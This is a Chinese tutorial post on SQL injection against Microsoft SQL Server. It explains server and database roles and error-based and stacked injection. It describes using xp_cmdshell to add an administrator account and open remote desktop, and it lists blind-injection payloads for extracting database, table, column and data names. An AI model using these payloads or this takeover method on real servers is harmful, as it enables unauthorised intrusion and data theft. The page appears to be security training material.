DAY8:SQL注入7-SQLserver

分类:MsSQL作者:编程之家用户
一、MSSQL基本使用 1. 增删改查

 

 

  二、MSSQL权限控制 1. MSSQL角色

*****服务器默认的public角色的权限是最低的

*****MySQL只涉及了数据库权限,要么是有最高数据库权限的root账号,要么是没有数据库最高权限的非root账号   2. SQLserver里面的数据库级别设置

含义:

 

 

3. 固定服务器角色(sysadmin简称sa,是服务器角色的最高权限)

判断服务器角色是否为sysadmin,是返回1,不是返回0 select is_srvrolemember('sysadmin')   4. 固定数据库角色(db_owner是数据库角色的最高权限)

判断数据库角色是否为db_owner,是返回1,不是返回0 select is_member('db_owner')   5. 权限控制扩展 https://docs.microsoft.com/zh-cn/sql/relational-databases/security/authentication-access/getting-started-with-database-engine-permissions?view=sql-server-2017 https://blog.csdn.net/johnf_nash/article/details/80224188     三、MSSQL注入 1. MSSQL手工注入 这里--后面不用加空格,直接表示注释 判断堆叠注入后面可以接任意语句,若页面正常返回则支持 以下方法用的是报错注入,若无报错则不能用此方法

quotename()函数将结果转换为字符型

sys和dbo默认可以省略,但最好还是加上,若省略则是两个点

 

 

2. 获取数据库版本,利用的是报错注入

windows NT 5.2即windows server 2003   3. 常用视图

 

 

4. 扩展存储过程

*****重点了解xp_cmdshell,只有sa权限可以调用xp_cmdshell

 

 

5. 检测与恢复扩展存储

新增用户ichunqiu并添加到administrators用户组 然后可以通过3389端口用新建的账号远程连接服务器 若服务器未开放3389端口,则再次调用xp_cmdshell执行命令开启3389端口   6. 检测SP_MAKEWEBTASK(备份功能)

差异备份/完整备份,不需要sa权限   7. 其他扩展存储

 

 

8. 课后阅读 MSSQL注入方式进阶 https://www.waitalone.cn/sqlserver-inject-skills.html https://www.freebuf.com/articles/web/55577.html MSSQL注入总结 https://blog.51cto.com/maxvision/1691962 MSSQL报错注入 http://blog.nsfocus.net/mssql-order-by/ MSSQL union注入 https://www.cnblogs.com/mynona/p/3622863.html MSSQL的union注入时,每一列的类型要相同,若不知道类型就用null MSSQL盲注 ①查数据库个数 and (select count(name) from master.sys.databases)=7 ②查当前数据库名 and ascii(substring((db_name()),1,1))>48 ③查所有数据库名 and ascii(substring((select name from master.dbo.sysdatabases where dbid=1),1,1))>48 and ascii(substring((select top 1 name from master.dbo.sysdatabases where name not in ('第一个库名', '第二个库名',,,,,,’第N-1个数据库名’)),N,1)) >= 56 ④查表名 and ascii(substring((select top 1 name from 数据库名.sys.sysobjects where xtype = 'U' and name not in ('第一个表名','第二个表名',,,,,,'第N-1个表名')),N,1)) >= 9 ⑤查列名 and ascii(substring((select top 1 name from 数据库名.sys.syscolumns where id=(select id from 数据库名.sys.sysobjects where xtype='U' and name='表名') and name not in ('第一个列名')),N,1)) >= 65 ⑥获取数据 and ascii(substring((select top 1 列名 from 表名),N,1)) >= 65

 

   

原文地址:https://www.cnblogs.com/niangaoSDS/p/11631096.html

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐

sqlalchemy的常用数据类型怎么使用
本篇内容主要讲解“sqlalchemy的常用数据类型怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“sqlalche...
sqlServer实现分页查询的方式有哪些
今天小编给大家分享一下sqlServer实现分页查询的方式有哪些的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家
sqlmap之os shell怎么使用
这篇文章主要介绍“sqlmap之osshell怎么使用”,在日常操作中,相信很多人在sqlmap之osshell怎么使用问题上存在疑惑,小编查阅了各式资料,整理出
SQL注入的知识点有哪些
本篇内容介绍了“SQL注入的知识点有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧...
SQL Server注入执行命令
1. mssql权限sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限db权限:文件管理,数据库操作等 users-administratorspublic权限:数据库操作 guest-users2、sql server注入执行命令查
sql执行计划如何查看?教你查看SQL执行计划的方法
sql执行计划如何查看?在SPL庞大的数据中我们不知道如何查看实际数据库中发生了什么事情,有必要定期进行查询优化和索引否则会影响我们后期的SQL的查询速度。那么针对这样的问题我们必须要知道SQL执行的计划,在本文中winwin7小编给大家分享下SQL执
Server Error,SQL Server错误代码大全
SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点应用非常广泛。不过在使用中,我们会遇到非常多的错误,面对这么庞大的数据库环境,当然会有精确的错误代码的对照季,下面小编分享的
SQL Server本地账户无法登陆error:40解决方法
SQL Server本地账户无法登陆出现错误提示:error:40-Could not open a connenction to SQL Server的问题很常见,对于初学者来说可能不知道如何解决,一起来看看下面的解决方案。解决步骤如下:1、这种情况需要开启 SQL Server service
SQL2008安装教程|SQL Server 2008详细安装图解
微软推出的SQL2008是一款非常好用的数据库软件,它稳定、功能强大,为众多企业提供了最佳的数据库解决方案,那么我们如何在Windows中安装它呢,一些朋友对SQL Server 2008的安装过程还不是很熟悉,下面就一起来看看SQL Server 2008详细安装图解...
如何在运行 SQL Server 的计算机之间移动数据库
本页概要如果您使用的是 SQL Server 2005备份和还原Sp_detach_db 和 Sp_attach_db 存储过程关于排序规则的说明导入和导出数据(在 SQL Server 数据库之间复
IDENTITY列的检查指定表的当前标识值
DBCC CHECKIDENT 检查指定表的当前标识值,如有必要,还对标识值进行更正。 语法 DBCC CHECKIDENT ( 'table_name' [ , { NORESEED
SQL Server 字符串函数速查
这里对 SQL Server 字符串函数进行分门别类地列出,便于查阅和记忆,相信大家都在其它方面有高深的编程基础,从字面上来说大家都知道这些函数的意义,就不对这些函数作过多的解释了,主要谈些经验,具体
SQL Server 数据库中查询及删除重复记录的方法
查询及删除重复记录的方法 1、查找表(people)中多余的重复记录,重复记录是根据单个字段(peopleId)来判断select*frompeoplewherepeopleIdin(selectpe
微软发SQL Server 2008第二个CTP预览版,微软新版开发工具VS 2008 beta2功能定案
微软发SQL Server 2008第二个CTP预览版from: http://news.csdn.net/n/20070807/107158.html8月7日消息,微软公司本周发布了SQL Serv
SQL Server PRB:联机丛书中的“孤立用户疑难解答”主题不完整
症状当您将数据库备份恢复到另一台服务器时,可能会遇到孤立用户的问题。SQL Server 联机丛书中的孤立用户疑难解答主题中没有讲述解决此问题的具体步骤。本文介绍了如何解决孤立用户问题。更多信息虽然术
SQL Server Error: No Process is on the Other End of the Pipe
当登录SQL Server 2005时可能碰到错误: 'No Process is on the Other End of the Pipe'。解决方法:(1)Open up SQL
如何解决在运行 SQL Server 的服务器之间移动数据库时的权限问题
概要本文描述如何映射标准登录和集成登录来解决在运行 SQL Server 的服务器之间移动数据库时的权限问题。更多信息当您将数据库从一个运行 SQL Server 的服务器移到另一个运行 SQL Se
SQL Sever 问题集锦
----------------------------------------问题:该用户与可信的SQL SERVER 连接无关联使用sa用户或自建用户使用“SQL SERVER 身份认证”连接数据
SQL Server 2005 的各种版本所支持的功能
更新日期: 2007 年 5 月 20 日 使用下表可以确定各种版本的 Microsoft SQL Server 2005 支持哪些功能。有关 SQL Server 2005 Enterprise E
SQL Server, 对于指定的缓冲区大小而言,源列的数据太大
当从Excel导入数据到Sql Sever中,可能会出现以下问题:
对于指定的缓冲区大小而言,源列的数据太大
pythonJavaScriptjavaHTMLPHPreactjsC#AndroidCSSNode.jssqlrpython-3.xMysqLjQueryc++pandasFlutterangularIOSdjangolinuxswifttypescript路由器JSON路由器设置无线路由器h3c华三华三路由器设置华三路由器电脑软件教程arraysdocker软件图文教程Cvue.jslaravelspring-boot